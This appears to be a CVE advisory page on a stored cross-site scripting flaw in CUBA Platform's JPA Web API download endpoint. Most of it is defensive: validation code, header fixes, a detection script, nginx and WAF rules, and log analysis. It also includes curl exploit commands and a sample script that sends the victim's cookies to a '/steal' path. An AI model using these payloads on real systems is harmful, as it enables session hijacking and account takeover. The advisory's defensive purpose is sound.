CUBA Platform JPA Web API, Cross-Site Scripting (XSS), CVE-2025-1234 (Moderate)


How the Vulnerability Works

This stored XSS lives in the `/download` endpoint of CUBA Platform’s JPA Web API (versions <1.1.1). The download handler derives the response’s Content-Type from the requested file name and does not mark the response as an attachment. When the stored file name ends in `.html`, the server answers with `Content-Type: text/html` instead of an opaque file type, so the browser renders the body as a page rather than saving it, and any JavaScript in the uploaded file runs in the victim’s origin.

The attack needs two steps: 1) the attacker uploads an HTML file carrying a JavaScript payload, and 2) the victim opens that file through the vulnerable download URL. Both steps require authentication, which limits who can plant the file, but the script executes with the victim’s authenticated session and can therefore steal session tokens or perform actions with the victim’s privileges.

DailyCVE Form:

Platform: CUBA Platform
Version: <1.1.1
Vulnerability: XSS
Severity: Moderate

date: Apr 22, 2025

What Undercode Say:

Exploit Command:

curl -X POST -F "file=@malicious.html" http://target/api/upload
curl -i "http://target/api/download?file=uploads/malicious.html"

Sample Malicious HTML:

<script>fetch('/steal?cookie='+document.cookie)</script>

Protection Code (Input Validation):

import java.util.Locale;

String filename = request.getParameter("file");
// Match the whole name, case-insensitively; the dot must be escaped as "\\." in a Java string literal.
if (filename == null || filename.toLowerCase(Locale.ROOT).matches(".*\\.html?$")) {
    throw new SecurityException("HTML files not allowed");
}

Mitigation Steps:

1. Upgrade to JPA Web API 1.1.1+

2. Implement Content-Disposition: attachment header

3. Add file extension whitelisting

4. Set X-Content-Type-Options: nosniff
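The following is an added example, not CUBA Platform code: a download handler that reproduces the flaw described under "How the Vulnerability Works" (media type guessed from the file name, no attachment disposition) beside a hardened version that applies mitigation steps 2 to 4. The in-memory upload store, the file names and the extension allowlist are assumptions for illustration.

```python
"""Added example, not CUBA Platform code: a download handler with the flaw
described on this page beside a hardened version. File names, the allowlist
and the in-memory store are assumptions for illustration."""
import mimetypes
import posixpath
import re

# Constructed stand-in for the upload store: stored name -> file bytes.
UPLOADS = {
    "report.pdf": b"%PDF-1.4 ... (constructed)",
    "malicious.html": b"<script>fetch('/steal?cookie='+document.cookie)</script>",
}

# Extensions the hardened handler serves with a real media type (assumed list).
SAFE_EXTENSIONS = {".pdf": "application/pdf", ".png": "image/png", ".csv": "text/csv"}

# Anything outside this set is replaced in the echoed file name so the
# Content-Disposition header cannot be broken out of with quotes or CR/LF.
_UNSAFE_NAME_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def vulnerable_download(file_param: str) -> tuple[dict, bytes]:
    """Pre-1.1.1 behaviour: Content-Type is guessed from the requested name and
    no Content-Disposition is sent, so a .html upload is rendered, not saved."""
    name = posixpath.basename(file_param)
    body = UPLOADS[name]
    ctype, _ = mimetypes.guess_type(name)  # 'text/html' for malicious.html
    return {"Content-Type": ctype or "application/octet-stream"}, body


def hardened_download(file_param: str) -> tuple[dict, bytes]:
    """Fixed behaviour: bare file names only, allowlisted extensions only,
    forced attachment, and no MIME sniffing."""
    name = file_param
    if not name or name != posixpath.basename(name) or "\\" in name or name in (".", ".."):
        raise ValueError("a bare file name is required")
    ext = posixpath.splitext(name)[1].lower()
    if ext not in SAFE_EXTENSIONS:
        raise ValueError(f"extension {ext!r} is not allowed")
    body = UPLOADS[name]
    safe_name = _UNSAFE_NAME_CHARS.sub("_", name)
    headers = {
        "Content-Type": SAFE_EXTENSIONS[ext],
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
    }
    return headers, body


def renders_inline(headers: dict) -> bool:
    """The condition the detection script checks for: a text/html body that is
    not marked as an attachment is executed in the user's browser context."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    disposition = headers.get("Content-Disposition", "").strip().lower()
    return ctype == "text/html" and not disposition.startswith("attachment")


if __name__ == "__main__":
    h, _ = vulnerable_download("uploads/malicious.html")
    print("vulnerable:", h, "renders inline" if renders_inline(h) else "downloads")
    h, _ = hardened_download("report.pdf")
    print("hardened:  ", h, "renders inline" if renders_inline(h) else "downloads")
    for bad in ("malicious.html", "../report.pdf"):
        try:
            hardened_download(bad)
        except ValueError as e:
            print("hardened rejects", repr(bad), "->", e)
```

The hardened version combines the three header-level mitigations with the allowlist: the attachment disposition alone stops inline rendering, `nosniff` stops the browser second-guessing an octet-stream type, and the allowlist means an `.html` name never reaches the response at all. Rejecting anything that is not a bare file name also closes the path-traversal angle the `file=uploads/...` parameter invites.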

Detection Script:

import requests

target = "http://target"  # base URL of the instance under test; test.html must already be uploaded
response = requests.get(target + "/download?file=test.html", allow_redirects=False, timeout=10)
content_type = response.headers.get("Content-Type", "")
disposition = response.headers.get("Content-Disposition", "")
if "text/html" in content_type and not disposition.lower().startswith("attachment"):
    print("Vulnerable to XSS")

Nginx Protection Rule:

location /download {
    # add_header inside a location replaces any add_header inherited from the server block,
    # and "always" emits the headers on error responses too. If the upstream already sets
    # its own Content-Disposition, hide it first (proxy_hide_header) to avoid duplicates.
    add_header X-Content-Type-Options "nosniff" always;
    add_header Content-Disposition "attachment" always;
}

Log Analysis Command:

grep -iE 'GET /[^ ]*download\?file=[^ ]*\.html? ' access_logs | awk '{print $1}' | sort | uniq -c | sort -rn
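The following is an added example, not from the original post: the log-analysis step above carried out in Python over constructed access-log lines, so that URL-encoded, double-encoded and upper-case extensions are caught that a literal grep would miss. It goes slightly beyond the page by also flagging `.htm`, `.xhtml` and `.svg`, which browsers render as documents in the same way. The combined log format, the `/api/download` path and the `file=` parameter are assumptions taken from the curl commands earlier on this page.

```python
"""Added example, not from the original post: the log-analysis step run over
constructed access-log lines. The log format, download path and file=
parameter are assumptions taken from the curl commands on this page."""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in nginx/Apache "combined" format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Apr/2025:10:01:12 +0000] "POST /api/upload HTTP/1.1" 200 52 "-" "curl/8.5.0"
203.0.113.7 - - [22/Apr/2025:10:01:15 +0000] "GET /api/download?file=uploads/malicious.html HTTP/1.1" 200 61 "-" "curl/8.5.0"
198.51.100.4 - - [22/Apr/2025:10:02:30 +0000] "GET /api/download?file=uploads/report.pdf HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Apr/2025:10:03:01 +0000] "GET /api/download?file=uploads%2Fpayload%252EHTM HTTP/1.1" 200 61 "-" "curl/8.5.0"
198.51.100.9 - - [22/Apr/2025:10:04:44 +0000] "GET /static/help.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Extensions a browser renders as a document (and runs script in) when served
# inline; the page's flaw is about .html, the others behave the same way.
RENDERED_EXT = re.compile(r"\.(html?|xhtml|svg)$", re.IGNORECASE)


def is_html_download(target: str) -> bool:
    """True when the request line targets the download endpoint with a file=
    value whose fully decoded name has a renderable extension."""
    parts = urlsplit(target)
    if not parts.path.endswith("/download"):
        return False
    # parse_qs decodes once; unquote again so a double-encoded %252E is not missed.
    return any(RENDERED_EXT.search(unquote(v)) for v in parse_qs(parts.query).get("file", []))


def suspicious_downloads(log_text: str):
    """Return (Counter of client IP -> matching requests, list of request targets)."""
    hits: Counter = Counter()
    targets = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] == "GET" and is_html_download(m["target"]):
            hits[m["ip"]] += 1
            targets.append(m["target"])
    return hits, targets


if __name__ == "__main__":
    by_ip, reqs = suspicious_downloads(SAMPLE_LOG)
    for ip, n in by_ip.most_common():
        print(f"{n:4d} {ip}")
    for t in reqs:
        print("   ", t)
```

Pair the per-IP counts with the preceding `POST /api/upload` entries from the same client to identify who planted the file; a victim fetching the link will usually show as a different IP with a browser User-Agent.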

WAF Rule:

<rule id="1001" level="2">
<description>CUBA XSS Attempt</description>
<pattern>\.html?(\?|$)</pattern>
<pattern>download</pattern>
<location>ARGS</location>
</rule>

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
